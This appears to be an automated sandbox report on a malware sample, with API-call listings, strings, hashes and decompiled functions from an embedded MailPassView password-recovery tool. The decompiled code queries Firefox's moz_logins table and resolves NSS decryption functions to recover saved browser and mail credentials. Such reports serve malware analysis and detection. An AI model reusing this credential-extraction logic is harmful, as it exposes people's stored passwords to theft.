                                                                • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                                • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                                • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                              • memset.MSVCRT ref: 0040CEA6
                                                              • memset.MSVCRT ref: 0040CEBF
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,0040D314,000000FF,?,00000104,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CED6
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CEF5
                                                              • memset.MSVCRT ref: 0040CF68
                                                              • memset.MSVCRT ref: 0040CF7A
                                                              • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040CFED
                                                              • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D003
                                                              • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D019
                                                              • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D02F
                                                              • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D045
                                                              • strcpy.MSVCRT(?,0040D314,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D05B
                                                              • memset.MSVCRT ref: 0040D076
                                                              • memset.MSVCRT ref: 0040D08A
                                                              • memset.MSVCRT ref: 0040D0ED
                                                              • memset.MSVCRT ref: 0040D101
                                                              • sprintf.MSVCRT ref: 0040D119
                                                              • sprintf.MSVCRT ref: 0040D12B
                                                              • _stricmp.MSVCRT(?,?,?,imap://%s,00000104,?,mailbox://%s,00000104,?,00000000,00000261,?,00000000,00000261,?,?), ref: 0040D13E
                                                              • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040D158
                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040D1DD
                                                              Strings
                                                              • imap://%s, xrefs: 0040D125
                                                              • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 0040CF2B
                                                              • mailbox://%s, xrefs: 0040D113
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$AddressProcstrcpy$CurrentDirectory$ByteCharLibraryLoadMultiWide_stricmpsprintfstrlen$HandleModule
                                                              • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins$imap://%s$mailbox://%s
                                                              • API String ID: 4276617627-3913509535
                                                              • Opcode ID: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                              • Instruction ID: 531ad7aca3640aed267cd003a13377454315b37e4b42da830508d09ae9ff7478
                                                              • Opcode Fuzzy Hash: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                              • Instruction Fuzzy Hash: 58B10A72C00219ABDB20EFA5CC819DEB7BDEF04315F1445BBE619B2191DB38AB858F54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 76%
                                                              			E0040A774(intOrPtr __ecx, void* __eflags) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				struct HMENU__* _t121;
                                                              				struct HWND__* _t122;
                                                              				intOrPtr _t128;
                                                              				int _t133;
                                                              				intOrPtr _t135;
                                                              				int _t149;
                                                              				void* _t166;
                                                              				void* _t174;
                                                              				void* _t178;
                                                              				void* _t185;
                                                              				intOrPtr _t194;
                                                              				void* _t197;
                                                              				void* _t198;
                                                              				intOrPtr _t200;
                                                              				intOrPtr _t201;
                                                              				void* _t202;
                                                              				int _t204;
                                                              				intOrPtr _t205;
                                                              				intOrPtr* _t207;
                                                              				intOrPtr* _t208;
                                                              				void* _t210;
                                                              				intOrPtr* _t211;
                                                              				void* _t213;
                                                              
                                                              				_t213 = __eflags;
                                                              				_t208 = _t210 - 0x78;
                                                              				_t211 = _t210 - 0xb8;
                                                              				 *((intOrPtr*)(_t208 + 0x70)) = __ecx;
                                                              				 *((char*)(_t208 - 0x37)) = 1;
                                                              				 *(_t208 - 0x40) = 0;
                                                              				 *((intOrPtr*)(_t208 - 0x3c)) = 0;
                                                              				 *((char*)(_t208 - 0x38)) = 0;
                                                              				 *((char*)(_t208 - 0x36)) = 0;
                                                              				 *((char*)(_t208 - 0x35)) = 0;
                                                              				asm("stosd");
                                                              				asm("stosd");
                                                              				 *(_t208 - 0x2c) = 1;
                                                              				 *((intOrPtr*)(_t208 - 0x28)) = 0x9c41;
                                                              				 *((char*)(_t208 - 0x24)) = 4;
                                                              				 *((char*)(_t208 - 0x23)) = 0;
                                                              				 *((char*)(_t208 - 0x22)) = 0;
                                                              				 *((char*)(_t208 - 0x21)) = 0;
                                                              				asm("stosd");
                                                              				asm("stosd");
                                                              				 *((intOrPtr*)(_t208 - 0x18)) = 5;
                                                              				 *((intOrPtr*)(_t208 - 0x14)) = 0x9c44;
                                                              				 *((char*)(_t208 - 0x10)) = 4;
                                                              				 *((char*)(_t208 - 0xf)) = 0;
                                                              				 *((char*)(_t208 - 0xe)) = 0;
                                                              				 *((char*)(_t208 - 0xd)) = 0;
                                                              				asm("stosd");
                                                              				asm("stosd");
                                                              				 *(_t208 - 4) = 2;
                                                              				 *_t208 = 0x9c48;
                                                              				 *((char*)(_t208 + 4)) = 4;
                                                              				 *((char*)(_t208 + 5)) = 0;
                                                              				 *((char*)(_t208 + 6)) = 0;
                                                              				 *((char*)(_t208 + 7)) = 0;
                                                              				asm("stosd");
                                                              				asm("stosd");
                                                              				 *((intOrPtr*)(_t208 + 0x10)) = 3;
                                                              				 *((intOrPtr*)(_t208 + 0x14)) = 0x9c49;
                                                              				 *((char*)(_t208 + 0x18)) = 4;
                                                              				 *((char*)(_t208 + 0x19)) = 0;
                                                              				 *((char*)(_t208 + 0x1a)) = 0;
                                                              				 *((char*)(_t208 + 0x1b)) = 0;
                                                              				asm("stosd");
                                                              				asm("stosd");
                                                              				 *((intOrPtr*)(_t208 + 0x24)) = 0;
                                                              				 *((intOrPtr*)(_t208 + 0x28)) = 0x9c4e;
                                                              				 *((char*)(_t208 + 0x2c)) = 4;
                                                              				 *((char*)(_t208 + 0x2d)) = 0;
                                                              				 *((char*)(_t208 + 0x2e)) = 0;
                                                              				 *((char*)(_t208 + 0x2f)) = 0;
                                                              				asm("stosd");
                                                              				asm("stosd");
                                                              				 *((intOrPtr*)(_t208 + 0x38)) = 6;
                                                              				 *((intOrPtr*)(_t208 + 0x3c)) = 0x9c56;
                                                              				 *((char*)(_t208 + 0x40)) = 4;
                                                              				 *((char*)(_t208 + 0x41)) = 0;
                                                              				 *((char*)(_t208 + 0x42)) = 0;
                                                              				 *((char*)(_t208 + 0x43)) = 0;
                                                              				asm("stosd");
                                                              				asm("stosd");
                                                              				 *((intOrPtr*)(_t208 + 0x4c)) = 4;
                                                              				 *((intOrPtr*)(_t208 + 0x50)) = 0x9c42;
                                                              				 *((char*)(_t208 + 0x54)) = 4;
                                                              				 *((char*)(_t208 + 0x55)) = 0;
                                                              				 *((char*)(_t208 + 0x56)) = 0;
                                                              				 *((char*)(_t208 + 0x57)) = 0;
                                                              				 *(_t208 + 0x6c) =  *(_t208 + 0x6c) | 0xffffffff;
                                                              				asm("stosd");
                                                              				_t198 = 0x66;
                                                              				asm("stosd");
                                                              				_t121 = E00407BB9(_t198);
                                                              				_t194 =  *((intOrPtr*)(_t208 + 0x70));
                                                              				 *(_t194 + 0x11c) = _t121;
                                                              				_t122 = SetMenu( *(_t194 + 0x108), _t121);
                                                              				__imp__#6(0x50000000, 0x412466,  *(_t194 + 0x108), 0x101, _t185, _t197, _t166);
                                                              				 *(_t194 + 0x114) = _t122;
                                                              				SendMessageA(_t122, 0x404, 1, _t208 + 0x6c);
                                                              				 *((intOrPtr*)(_t194 + 0x118)) = CreateToolbarEx( *(_t194 + 0x108), 0x50010900, 0x102, 7, 0, LoadImageA( *0x416b94, 0x68, 0, 0, 0, 0x9060), _t208 - 0x40, 8, 0x10, 0x10, 0x70, 0x10, 0x14);
                                                              				E004023D4( *((intOrPtr*)(_t194 + 0x370)), _t213, CreateWindowExA(0, "SysListView32", 0, 0x50810809, 0, 0, 0x190, 0xc8,  *(_t194 + 0x108), 0x103,  *0x416b94, 0), 1);
                                                              				_t128 =  *((intOrPtr*)(_t194 + 0x370));
                                                              				_t173 =  *((intOrPtr*)(_t128 + 0x1b0));
                                                              				_t200 =  *((intOrPtr*)(_t128 + 0x1b4));
                                                              				 *((intOrPtr*)(_t208 + 0x68)) =  *((intOrPtr*)(_t128 + 0x184));
                                                              				if(_t173 <= 0) {
                                                              					L3:
                                                              					_t201 =  *((intOrPtr*)(_t194 + 0x370));
                                                              					E00409EC4(_t201);
                                                              					_t133 = ImageList_ReplaceIcon( *(_t201 + 0x18c), 0, LoadIconA( *0x416b94, 0x66));
                                                              					if( *((intOrPtr*)(_t201 + 0x1b8)) != 0) {
                                                              						E00409E32(_t133, _t173, _t194, _t201);
                                                              					}
                                                              					_t202 = 0x68;
                                                              					 *((intOrPtr*)(_t194 + 0x154)) = E00407BB9(_t202);
                                                              					_t135 =  *((intOrPtr*)(_t194 + 0x37c));
                                                              					if( *((intOrPtr*)(_t135 + 0x30)) <= 0) {
                                                              						_t174 = 0x412466;
                                                              					} else {
                                                              						if( *((intOrPtr*)(_t135 + 0x1c)) <= 0) {
                                                              							_t174 = 0;
                                                              						} else {
                                                              							_t174 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0xc)))) +  *((intOrPtr*)(_t135 + 0x10));
                                                              						}
                                                              					}
                                                              					_push("/noloadsettings");
                                                              					_push(_t174);
                                                              					L004115B2();
                                                              					if(_t135 == 0) {
                                                              						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
                                                              					}
                                                              					E0040AF17(_t194, 0);
                                                              					 *( *(_t194 + 0x36c)) = 1;
                                                              					SetFocus( *( *((intOrPtr*)(_t194 + 0x370)) + 0x184));
                                                              					if( *0x417660 == 0) {
                                                              						E00406172(0x417660);
                                                              						if((GetFileAttributesA(0x417660) & 0x00000001) != 0) {
                                                              							GetTempPathA(0x104, 0x417660);
                                                              						}
                                                              					}
                                                              					_t204 = strlen(0x417660);
                                                              					 *_t211 = "report.html";
                                                              					_t99 = strlen(??) + 1; // 0x1
                                                              					_t223 = _t204 + _t99 - 0x104;
                                                              					if(_t204 + _t99 >= 0x104) {
                                                              						 *((char*)(_t194 + 0x264)) = 0;
                                                              					} else {
                                                              						E004062AD(_t194 + 0x264, 0x417660, "report.html");
                                                              					}
                                                              					_push(1);
                                                              					_t178 = 0x30;
                                                              					E0040A00B( *((intOrPtr*)(_t194 + 0x370)), _t178);
                                                              					E0040A00B( *((intOrPtr*)(_t194 + 0x370)), 1, ( *(_t194 + 0x36c))[1]);
                                                              					_t149 = RegisterWindowMessageA("commdlg_FindReplace");
                                                              					_t205 = _t194;
                                                              					 *(_t194 + 0x374) = _t149;
                                                              					E0040A27F(0, 1, _t205, _t223);
                                                              					E00401E8B(_t223,  *((intOrPtr*)(_t205 + 0x370)) + 0xb20);
                                                              					 *(_t208 + 0x60) = 0x12c;
                                                              					 *((intOrPtr*)(_t208 + 0x64)) = 0x400;
                                                              					SendMessageA( *(_t205 + 0x114), 0x404, 2, _t208 + 0x60);
                                                              					return SendMessageA( *(_t205 + 0x114), 0x401, 0x1001, 0);
                                                              				} else {
                                                              					_t207 = _t200 + 0xc;
                                                              					 *((intOrPtr*)(_t208 + 0x74)) = _t173;
                                                              					do {
                                                              						_t173 =  *((intOrPtr*)(_t207 - 8));
                                                              						E00404925( *((intOrPtr*)(_t207 + 4)),  *((intOrPtr*)(_t207 - 8)),  *((intOrPtr*)(_t208 + 0x68)),  *((intOrPtr*)(_t207 - 0xc)),  *((intOrPtr*)(_t207 - 4)),  *_t207);
                                                              						_t211 = _t211 + 0x10;
                                                              						_t207 = _t207 + 0x14;
                                                              						_t82 = _t208 + 0x74;
                                                              						 *_t82 =  *((intOrPtr*)(_t208 + 0x74)) - 1;
                                                              					} while ( *_t82 != 0);
                                                              					goto L3;
                                                              				}
                                                              			}





























                                                              0x0040a774
                                                              0x0040a775
                                                              0x0040a779
                                                              0x0040a782
                                                              0x0040a785
                                                              0x0040a78d
                                                              0x0040a790
                                                              0x0040a793
                                                              0x0040a796
                                                              0x0040a799
                                                              0x0040a79f
                                                              0x0040a7a0
                                                              0x0040a7a1
                                                              0x0040a7a8
                                                              0x0040a7af
                                                              0x0040a7b3
                                                              0x0040a7b6
                                                              0x0040a7b9
                                                              0x0040a7c1
                                                              0x0040a7c2
                                                              0x0040a7c3
                                                              0x0040a7ca
                                                              0x0040a7d1
                                                              0x0040a7d5
                                                              0x0040a7d8
                                                              0x0040a7db
                                                              0x0040a7e3
                                                              0x0040a7e4
                                                              0x0040a7e5
                                                              0x0040a7ec
                                                              0x0040a7f3
                                                              0x0040a7f7
                                                              0x0040a7fa
                                                              0x0040a7fd
                                                              0x0040a805
                                                              0x0040a806
                                                              0x0040a807
                                                              0x0040a80e
                                                              0x0040a815
                                                              0x0040a819
                                                              0x0040a81c
                                                              0x0040a81f
                                                              0x0040a827
                                                              0x0040a828
                                                              0x0040a829
                                                              0x0040a82c
                                                              0x0040a833
                                                              0x0040a837
                                                              0x0040a83a
                                                              0x0040a83d
                                                              0x0040a845
                                                              0x0040a846
                                                              0x0040a847
                                                              0x0040a84e
                                                              0x0040a855
                                                              0x0040a859
                                                              0x0040a85c
                                                              0x0040a85f
                                                              0x0040a867
                                                              0x0040a868
                                                              0x0040a869
                                                              0x0040a870
                                                              0x0040a877
                                                              0x0040a87b
                                                              0x0040a87e
                                                              0x0040a881
                                                              0x0040a884
                                                              0x0040a88d
                                                              0x0040a890
                                                              0x0040a891
                                                              0x0040a892
                                                              0x0040a897
                                                              0x0040a8a1
                                                              0x0040a8a7
                                                              0x0040a8c2
                                                              0x0040a8d4
                                                              0x0040a8da
                                                              0x0040a927
                                                              0x0040a95f
                                                              0x0040a964
                                                              0x0040a96a
                                                              0x0040a972
                                                              0x0040a97e
                                                              0x0040a981
                                                              0x0040a9aa
                                                              0x0040a9aa
                                                              0x0040a9b2
                                                              0x0040a9cd
                                                              0x0040a9d9
                                                              0x0040a9db
                                                              0x0040a9db
                                                              0x0040a9e2
                                                              0x0040a9e8
                                                              0x0040a9ee
                                                              0x0040a9f7
                                                              0x0040aa0c
                                                              0x0040a9f9
                                                              0x0040a9fc
                                                              0x0040aa08
                                                              0x0040a9fe
                                                              0x0040aa03
                                                              0x0040aa03
                                                              0x0040a9fc
                                                              0x0040aa11
                                                              0x0040aa16
                                                              0x0040aa17
                                                              0x0040aa20
                                                              0x0040aa2c
                                                              0x0040aa2c
                                                              0x0040aa35
                                                              0x0040aa40
                                                              0x0040aa52
                                                              0x0040aa63
                                                              0x0040aa65
                                                              0x0040aa73
                                                              0x0040aa7b
                                                              0x0040aa7b
                                                              0x0040aa73
                                                              0x0040aa87
                                                              0x0040aa89
                                                              0x0040aa95
                                                              0x0040aa99
                                                              0x0040aa9f
                                                              0x0040aaba
                                                              0x0040aaa1
                                                              0x0040aab1
                                                              0x0040aab7
                                                              0x0040aac6
                                                              0x0040aaca
                                                              0x0040aacb
                                                              0x0040aae2
                                                              0x0040aaec
                                                              0x0040aaf4
                                                              0x0040aaf6
                                                              0x0040aafc
                                                              0x0040ab0d
                                                              0x0040ab29
                                                              0x0040ab30
                                                              0x0040ab37
                                                              0x0040ab53
                                                              0x0040a983
                                                              0x0040a983
                                                              0x0040a986
                                                              0x0040a989
                                                              0x0040a991
                                                              0x0040a99a
                                                              0x0040a99f
                                                              0x0040a9a2
                                                              0x0040a9a5
                                                              0x0040a9a5
                                                              0x0040a9a5
                                                              0x00000000
                                                              0x0040a989

                                                              APIs
                                                                • Part of subcall function 00407BB9: LoadMenuA.USER32 ref: 00407BC1
                                                                • Part of subcall function 00407BB9: sprintf.MSVCRT ref: 00407BE4
                                                              • SetMenu.USER32(?,00000000), ref: 0040A8A7
                                                              • #6.COMCTL32(50000000,Function_00012466,?,00000101), ref: 0040A8C2
                                                              • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040A8DA
                                                              • LoadImageA.USER32 ref: 0040A8F0
                                                              • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000007,00000000,00000000,?,00000008,00000010,00000010,00000070,00000010,00000014), ref: 0040A91A
                                                              • CreateWindowExA.USER32 ref: 0040A950
                                                              • LoadIconA.USER32(00000066,00000000), ref: 0040A9BF
                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040A9CD
                                                              • _stricmp.MSVCRT(Function_00012466,/noloadsettings), ref: 0040AA17
                                                              • RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MailPassView), ref: 0040AA2C
                                                              • SetFocus.USER32(?,00000000), ref: 0040AA52
                                                              • GetFileAttributesA.KERNEL32(00417660), ref: 0040AA6B
                                                              • GetTempPathA.KERNEL32(00000104,00417660), ref: 0040AA7B
                                                              • strlen.MSVCRT ref: 0040AA82
                                                              • strlen.MSVCRT ref: 0040AA90
                                                              • RegisterWindowMessageA.USER32(commdlg_FindReplace,?,00000001), ref: 0040AAEC
                                                                • Part of subcall function 00404925: strlen.MSVCRT ref: 00404942
                                                                • Part of subcall function 00404925: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404966
                                                              • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040AB37
                                                              • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040AB4A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$Send$Loadstrlen$CreateIconImageMenuWindow$AttributesDeleteFileFocusList_PathRegisterReplaceTempToolbar_stricmpsprintf
                                                              • String ID: /noloadsettings$Software\NirSoft\MailPassView$SysListView32$`vA$commdlg_FindReplace$report.html
                                                              • API String ID: 873469642-860065374
                                                              • Opcode ID: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
                                                              • Instruction ID: ca2bded9840d9beafebaacef77bacb5142d556b3fd29cdc4ce09694084a06bb6
                                                              • Opcode Fuzzy Hash: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
                                                              • Instruction Fuzzy Hash: 82B12271644388FFEB16CF74CC45BDABBA5BF14304F00406AFA44A7292C7B5A954CB5A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 88%
                                                              			E0040DB39(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, void _a10, unsigned int _a12, void _a264, void _a265, void _a520, void _a521, void _a776, void _a780, char _a784, char _a1056, void _a1057, char _a2080, void _a2081, char _a3104, void _a3105) {
                                                              				char _v0;
                                                              				struct HWND__* _v4;
                                                              				void* __edi;
                                                              				void* _t44;
                                                              				void* _t58;
                                                              				int _t59;
                                                              				int _t61;
                                                              				int _t62;
                                                              				long _t66;
                                                              				struct HWND__* _t93;
                                                              				intOrPtr _t122;
                                                              				unsigned int _t125;
                                                              				signed int _t127;
                                                              				signed int _t128;
                                                              				void* _t134;
                                                              
                                                              				_t128 = _t127 & 0xfffffff8;
                                                              				E004118A0(0x1424, __ecx);
                                                              				_t44 = _a8 - 0x110;
                                                              				if(_t44 == 0) {
                                                              					E00406491(__edx, _a4);
                                                              					 *_t128 = 0x7ff;
                                                              					_a3104 = 0;
                                                              					memset( &_a3105, 0, ??);
                                                              					asm("movsd");
                                                              					asm("movsd");
                                                              					asm("movsw");
                                                              					memset( &_a10, 0, 0xfb);
                                                              					_a520 = 0;
                                                              					memset( &_a521, 0, 0xff);
                                                              					_a264 = 0;
                                                              					memset( &_a265, 0, 0xff);
                                                              					_a1056 = 0;
                                                              					memset( &_a1057, 0, 0x3ff);
                                                              					_a2080 = 0;
                                                              					memset( &_a2081, 0, 0x3ff);
                                                              					_t134 = _t128 + 0x48;
                                                              					_t58 = GetCurrentProcess();
                                                              					_t102 =  &_a520;
                                                              					_v4 = _t58;
                                                              					_t59 = ReadProcessMemory(_t58,  *0x416c64,  &_a520, 0x80, 0);
                                                              					__eflags = _t59;
                                                              					if(_t59 != 0) {
                                                              						E00406585( &_a1056,  &_a520, 4);
                                                              						_pop(_t102);
                                                              					}
                                                              					_t61 = ReadProcessMemory(_v4,  *0x416c58,  &_a264, 0x80, 0);
                                                              					__eflags = _t61;
                                                              					if(_t61 != 0) {
                                                              						E00406585( &_a2080,  &_a264, 0);
                                                              						_pop(_t102);
                                                              					}
                                                              					_t62 = E0040629C();
                                                              					__eflags = _t62;
                                                              					if(_t62 == 0) {
                                                              						E0040E056();
                                                              					} else {
                                                              						E0040E0DA();
                                                              					}
                                                              					__eflags =  *0x417514;
                                                              					if(__eflags != 0) {
                                                              						L17:
                                                              						_a776 = 0;
                                                              						memset( &_a780, 0, 0x114);
                                                              						_t122 =  *0x416e7c; // 0x0
                                                              						_t134 = _t134 + 0xc;
                                                              						_t66 = GetCurrentProcessId();
                                                              						 *0x417108 = 0;
                                                              						E0040E255(_t102, __eflags, _t66, _t122);
                                                              						__eflags =  *0x417108;
                                                              						if( *0x417108 != 0) {
                                                              							memcpy( &_a776, 0x416ff0, 0x118);
                                                              							_t134 = _t134 + 0xc;
                                                              							__eflags =  *0x417108;
                                                              							if( *0x417108 != 0) {
                                                              								strcpy( &_v0, E004061E6( &_a784));
                                                              							}
                                                              						}
                                                              						goto L20;
                                                              					} else {
                                                              						__eflags =  *0x417518;
                                                              						if(__eflags == 0) {
                                                              							L20:
                                                              							sprintf( &_a3104, "Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n",  *0x416e70,  *0x416e7c,  &_v0,  *0x416c50,  *0x416c44,  *0x416c4c,  *0x416c48,  *0x416c40,  *0x416c3c,  *0x416c54,  *0x416c64,  *0x416c58,  &_a1056,  &_a2080);
                                                              							SetDlgItemTextA(_a4, 0x3ea,  &_a3104);
                                                              							SetFocus(GetDlgItem(_a4, 0x3ea));
                                                              							L21:
                                                              							return 0;
                                                              						}
                                                              						goto L17;
                                                              					}
                                                              				}
                                                              				if(_t44 == 1) {
                                                              					_t125 = _a12;
                                                              					if(_t125 >> 0x10 == 0) {
                                                              						if(_t125 == 3) {
                                                              							_t93 = GetDlgItem(_a4, 0x3ea);
                                                              							_v4 = _t93;
                                                              							SendMessageA(_t93, 0xb1, 0, 0xffff);
                                                              							SendMessageA(_v4, 0x301, 0, 0);
                                                              							SendMessageA(_v4, 0xb1, 0, 0);
                                                              						}
                                                              					}
                                                              				}
                                                              				goto L21;
                                                              			}


















                                                              0x0040db3c
                                                              0x0040db44
                                                              0x0040db4c
                                                              0x0040db54
                                                              0x0040dbd8
                                                              0x0040dbdf
                                                              0x0040dbef
                                                              0x0040dbf6
                                                              0x0040dc04
                                                              0x0040dc08
                                                              0x0040dc14
                                                              0x0040dc16
                                                              0x0040dc2d
                                                              0x0040dc34
                                                              0x0040dc46
                                                              0x0040dc4d
                                                              0x0040dc64
                                                              0x0040dc6b
                                                              0x0040dc7d
                                                              0x0040dc84
                                                              0x0040dc89
                                                              0x0040dc8c
                                                              0x0040dc9e
                                                              0x0040dcac
                                                              0x0040dcb1
                                                              0x0040dcb3
                                                              0x0040dcb5
                                                              0x0040dcc8
                                                              0x0040dcce
                                                              0x0040dcce
                                                              0x0040dce7
                                                              0x0040dce9
                                                              0x0040dceb
                                                              0x0040dcfd
                                                              0x0040dd03
                                                              0x0040dd03
                                                              0x0040dd04
                                                              0x0040dd09
                                                              0x0040dd0b
                                                              0x0040dd14
                                                              0x0040dd0d
                                                              0x0040dd0d
                                                              0x0040dd0d
                                                              0x0040dd19
                                                              0x0040dd1f
                                                              0x0040dd29
                                                              0x0040dd37
                                                              0x0040dd3e
                                                              0x0040dd43
                                                              0x0040dd49
                                                              0x0040dd4c
                                                              0x0040dd54
                                                              0x0040dd5a
                                                              0x0040dd5f
                                                              0x0040dd67
                                                              0x0040dd7b
                                                              0x0040dd80
                                                              0x0040dd83
                                                              0x0040dd89
                                                              0x0040dd9d
                                                              0x0040dda3
                                                              0x0040dd89
                                                              0x00000000
                                                              0x0040dd21
                                                              0x0040dd21
                                                              0x0040dd27
                                                              0x0040dda4
                                                              0x0040de08
                                                              0x0040de21
                                                              0x0040de32
                                                              0x0040de38
                                                              0x0040de40
                                                              0x0040de40
                                                              0x00000000
                                                              0x0040dd27
                                                              0x0040dd1f
                                                              0x0040db57
                                                              0x0040db5d
                                                              0x0040db68
                                                              0x0040db8b
                                                              0x0040db99
                                                              0x0040dbb4
                                                              0x0040dbb8
                                                              0x0040dbc5
                                                              0x0040dbce
                                                              0x0040dbce
                                                              0x0040db8b
                                                              0x0040db68
                                                              0x00000000

                                                              APIs
                                                              Strings
                                                              • {Unknown}, xrefs: 0040DBFB
                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040DE02
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusTextmemcpysprintfstrcpy
                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                              • API String ID: 138940113-3474136107
                                                              • Opcode ID: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
                                                              • Instruction ID: 36e6f19d437acde9dae1843bd1f228cb1d7049f577ea92cd8b51c55dddb48a69
                                                              • Opcode Fuzzy Hash: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
                                                              • Instruction Fuzzy Hash: 6D711C72844244BFD721EF51DC41EEB3BEDEF94344F00843EF649921A0DA399A58CBA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040DEEE(struct HINSTANCE__** __esi, intOrPtr _a4) {
                                                              				void _v267;
                                                              				char _v268;
                                                              				void _v531;
                                                              				char _v532;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				int _t39;
                                                              				void* _t44;
                                                              				struct HINSTANCE__* _t53;
                                                              				struct HINSTANCE__* _t56;
                                                              				struct HINSTANCE__** _t69;
                                                              
                                                              				_t69 = __esi;
                                                              				_v268 = 0;
                                                              				memset( &_v267, 0, 0x104);
                                                              				if(_a4 != 0) {
                                                              					E004060D0(0x104,  &_v268, _a4);
                                                              				}
                                                              				if(_v268 != 0) {
                                                              					GetCurrentDirectoryA(0x104,  &(_t69[8]));
                                                              					SetCurrentDirectoryA( &_v268);
                                                              					_v532 = 0;
                                                              					memset( &_v531, 0, 0x104);
                                                              					_t39 = strlen("nss3.dll");
                                                              					_t13 = strlen( &_v268) + 1; // 0x1
                                                              					if(_t39 + _t13 >= 0x104) {
                                                              						_v532 = 0;
                                                              					} else {
                                                              						E004062AD( &_v532,  &_v268, "nss3.dll");
                                                              					}
                                                              					_t44 = GetModuleHandleA( &_v532);
                                                              					 *_t69 = _t44;
                                                              					if(_t44 != 0) {
                                                              						L9:
                                                              						_t69[1] = GetProcAddress( *_t69, "NSS_Init");
                                                              						_t69[2] = GetProcAddress( *_t69, "NSS_Shutdown");
                                                              						_t69[3] = GetProcAddress( *_t69, "PK11_GetInternalKeySlot");
                                                              						_t69[4] = GetProcAddress( *_t69, "PK11_FreeSlot");
                                                              						_t69[5] = GetProcAddress( *_t69, "PK11_CheckUserPassword");
